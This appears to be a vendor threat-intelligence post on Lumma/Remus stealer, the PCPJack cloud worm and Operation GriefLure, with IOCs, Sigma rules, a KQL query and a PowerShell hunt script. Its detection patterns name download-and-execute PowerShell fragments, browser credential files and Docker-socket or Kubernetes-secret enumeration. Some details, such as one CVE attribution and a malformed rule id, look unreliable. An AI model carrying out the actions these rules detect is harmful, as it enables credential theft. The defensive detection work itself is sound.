Threat Summary
Recent OTX pulses reveal a convergence of sophisticated credential theft tactics spanning supply chain compromises, cloud-native worms, and targeted APT campaigns. Adversaries are actively evolving infostealers like Lumma into 64-bit variants (dubbed Remus) utilizing blockchain-based C2 channels (EtherHiding) to evade takedowns. Simultaneously, a new cloud worm dubbed PCPJack is propagating across exposed containerized infrastructure, evicting rival malware (TeamPCP) and harvesting cloud credentials. Furthermore, Operation GriefLure demonstrates a return to spear-phishing legal documents to deploy living-off-the-land binaries in targeted attacks against telecom and healthcare sectors. The collective objective across these pulses is the mass exfiltration of browser data, cryptocurrency wallets, SSH keys, and cloud API tokens.
Threat Actor / Malware Profile
Lumma Stealer (Remus Variant)
- Distribution: Primarily distributed via malicious NuGet packages typosquatting Chinese .NET libraries (e.g., packages by
bmrxntfj) and cracked software sites. - Payload Behavior: A 64-bit infostealer targeting browser credentials, crypto wallets (exodus, atomic), and 2FA extensions.
- C2 Communication: Evolves from standard HTTP/HTTPS dead-drops to EtherHiding, utilizing blockchain transactions for C2 discovery to resist infrastructure takedowns.
- Persistence: Uses scheduled tasks and registry run keys.
- Anti-Analysis: Employs .NET Reactor obfuscation, process spoofing, and anti-debugging checks specific to the Remus variant.
PCPJack
- Distribution: Exploits vulnerable Docker and Kubernetes APIs (specifically targeting CVE-2025-29927 and others).
- Payload Behavior: A credential worm designed to propagate laterally across cloud environments. It systematically removes artifacts of the TeamPCP actor before deploying its own payload.
- C2 Communication: Exfiltrates harvested cloud credentials (AWS, GCP, Azure) and developer tokens to attacker-controlled infrastructure.
- Persistence: Infects container images and cron jobs/jobs within Kubernetes clusters.
Operation GriefLure
- Threat Actor: Unknown APT group targeting military telecom (Viettel) and healthcare (St. Luke's).
- Distribution: Spear-phishing emails weaponizing authentic-looking legal documents and whistleblower complaints.
- Payload Behavior: Utilizes living-off-the-land binaries (LOLBins) like
sfsvc.exeand side-loaded360.dllto evade detection. - Objective: Long-term espionage and credential harvesting within sensitive networks.
IOC Analysis
The provided IOCs present a mix of infrastructure and file artifacts indicative of multi-vector campaigns:
- Domains & URLs: A mix of C2 domains for infostealers (e.g.,
dns-providersa2.com,forestoaker.com) and credential harvesting phishing sites (e.g.,lastpass-login-help.com). - File Hashes: Numerous SHA256 and MD5 hashes associated with the Remus (Lumma) variant, malicious NuGet packages, and the GriefLure payloads.
- CVEs: Specific vulnerabilities exploited by PCPJack (CVE-2025-29927, CVE-2026-1357) and the PAN-OS zero-day (CVE-2023-33538).
- Operationalization: SOC teams should immediately block the listed domains at the proxy/DNS firewall level. File hashes should be uploaded to EDR solutions for hunting. The CVEs indicate a need for immediate patching of PAN-OS firewalls and container orchestration platforms.
- Tooling: Use
nslookupordigto validate domain resolution,curlto check HTTP responses, andvt-cliorsigmacto correlate with existing threat intelligence feeds.
Detection Engineering
YAML
---
title: Potential Malicious NuGet Package Execution - Supply Chain
id: 48a2d23f-8f31-4567-a23b-4e3a4125f78a
description: Detects execution of processes spawned by NuGet or dotnet tools involving typosquatted packages or suspicious child processes like obfuscated PowerShell.
status: experimental
date: 2026/05/09
author: Security Arsenal
references:
- https://otx.alienvault.com/pulse/663b1c3e9a6b4c0f8b3d1e9a
tags:
- attack.supply_chain
- attack.execution
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|endswith:
- '\nuget.exe'
- '\dotnet.exe'
- '\MSBuild.exe'
selection_child:
Image|endswith:
- '\powershell.exe'
- '\cmd.exe'
- '\rundll32.exe'
CommandLine|contains:
- 'downloadstring'
- 'iex'
- 'FromBase64String'
condition: selection_parent and selection_child
falsepositives:
- Legitimate build scripts utilizing PowerShell for post-build steps
level: high
---
title: Credential Theft via Browser Database Access
id: b12c4d5e-6789-0123-4567-89abcdef0123
description: Detects processes attempting to access SQLite database files used by browsers to store credentials and cookies.
status: experimental
date: 2026/05/09
author: Security Arsenal
references:
- https://otx.alienvault.com/pulse/663b1c3e9a6b4c0f8b3d1e9b
tags:
- attack.credential_access
- attack.collection
logsource:
category: file_access
product: windows
detection:
selection:
TargetFilename|contains:
- '\Google\Chrome\User Data\Default\Cookies'
- '\Google\Chrome\User Data\Default\Login Data'
- '\Mozilla\Firefox\Profiles\'
- '\BraveSoftware\Brave-Browser\User Data\Default\Cookies'
filter_legit:
Image|endswith:
- '\chrome.exe'
- '\firefox.exe'
- '\brave.exe'
condition: selection and not filter_legit
falsepositives:
- Third-party password managers performing backups
level: high
---
title: PCPJack Cloud Worm Activity - Docker Socket Mount
id: e3f7g8h9-1011-1213-1415-161718192021
description: Detects potential PCPJack worm activity characterized by suspicious Docker CLI usage mounting the Docker socket or enumerating secrets.
status: experimental
date: 2026/05/09
author: Security Arsenal
references:
- https://otx.alienvault.com/pulse/663b1c3e9a6b4c0f8b3d1e9c
tags:
- attack.execution
- attack.privilege_escalation
logsource:
category: process_creation
product: linux
detection:
selection_docker:
Image|endswith: '/docker'
CommandLine|contains:
- 'run -v /var/run/docker.sock'
- 'inspect --format={{.HostConfig.Binds}}'
selection_kubectl:
Image|endswith: '/kubectl'
CommandLine|contains:
- 'get secrets'
- 'get serviceaccounts'
condition: 1 of selection_*
falsepositives:
- Legitimate DevOps administration
level: medium
kql
// Hunt for Lumma/Remus and GriefLure File Hashes
let IOCs = dynamic([
"efb675de4b3af3dac3c9cae91075fd7cc2f4f98e", "019e6c2cf58386039133981f3377b085fbd70c98ae8613c7c6a4f10a9f2d9824",
"b037fa1dd769891b538d9ca26131890c93e3458eec96c5354bdebe50d04a5b3d", "e41c635e4c3514e266d143d544ad1abde5db3dcfe6cccdf9bb7a218003f8ab6a",
"6c6cbed6aad96564ed87094785be07a1"
]);
DeviceProcessEvents
| where SHA1 in (IOCs) or SHA256 in (IOCs) or MD5 in (IOCs)
| project Timestamp, DeviceName, FileName, ProcessCommandLine, SHA256, InitiatingProcessFileName
| extend Alert = "Known Malicious Hash Detected"
| order by Timestamp desc
powershell
# IOC Hunt Script for Lumma/PCPJack Indicators
# Requires Administrator privileges
$MaliciousHashes = @(
"019e6c2cf58386039133981f3377b085fbd70c98ae8613c7c6a4f10a9f2d9824",
"34e2d63b5db7e24c808711c2ca0c0a42afde97a0086d7d81609110c002d18d7c",
"596c453c9dbb7240f1ce05cc025496524ce7c538c23a9b2171174bf32b5691a1",
"b037fa1dd769891b538d9ca26131890c93e3458eec96c5354bdebe50d04a5b3d"
)
$C2Domains = @(
"dns-providersa2.com",
"forestoaker.com",
"krondez.com",
"lastpass-login-help.com"
)
Write-Host "[+] Scanning for Malicious File Hashes..." -ForegroundColor Cyan
Get-ChildItem -Path "C:\" -Recurse -ErrorAction SilentlyContinue |
Where-Object { $_.Length -gt 0kb -and $_.Length -lt 50mb } |
ForEach-Object {
$hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
if ($MaliciousHashes -contains $hash) {
Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName)" -ForegroundColor Red
}
}
Write-Host "[+] Checking Hosts File for C2 Domains..." -ForegroundColor Cyan
$hostsPath = "$env:SystemRoot\System32\drivers\etc\hosts"
if (Test-Path $hostsPath) {
$hostsContent = Get-Content $hostsPath
foreach ($domain in $C2Domains) {
if ($hostsContent -match $domain) {
Write-Host "[!] SUSPICIOUS ENTRY IN HOSTS FILE: $domain" -ForegroundColor Red
}
}
}
Write-Host "[+] Scanning for suspicious NuGet cache directories..." -ForegroundColor Cyan
$nugetPath = "$env:USERPROFILE\.nuget\packages"
if (Test-Path $nugetPath) {
# Check for recently created packages matching typosquat patterns (heuristic)
Get-ChildItem -Path $nugetPath -Recurse -Directory |
Where-Object { $_.CreationTime -gt (Get-Date).AddDays(-7) } |
Select-Object FullName, CreationTime
}
Response Priorities
- Immediate (0-4h): Block all identified C2 domains and IPs (
dns-providersa2.com,149.104.66.84, etc.) at perimeter firewalls and proxies. Initiate a hunt for the specific file hashes provided in the pulses across all endpoints. - 24 Hours: If credential-stealing malware (Lumma/Remus) is suspected, force a password reset for all accounts accessed from infected endpoints and invalidate session tokens. Review NuGet package sources in development environments to ensure no typosquatted packages (
bmrxntfj) have been pulled. - 1 Week: Apply patches for the PAN-OS CVE-2023-33538 and related vulnerabilities immediately. Harden Kubernetes/Docker configurations to restrict API access and prevent PCPJack propagation (disable anonymous auth, restrict RBAC).
Related Resources
Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub
darkwebotx-pulsedarkweb-credentialslumma-stealerpcpjackgrieflurenuget-supply-chaincredential-theft
Is your security operations ready?
Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.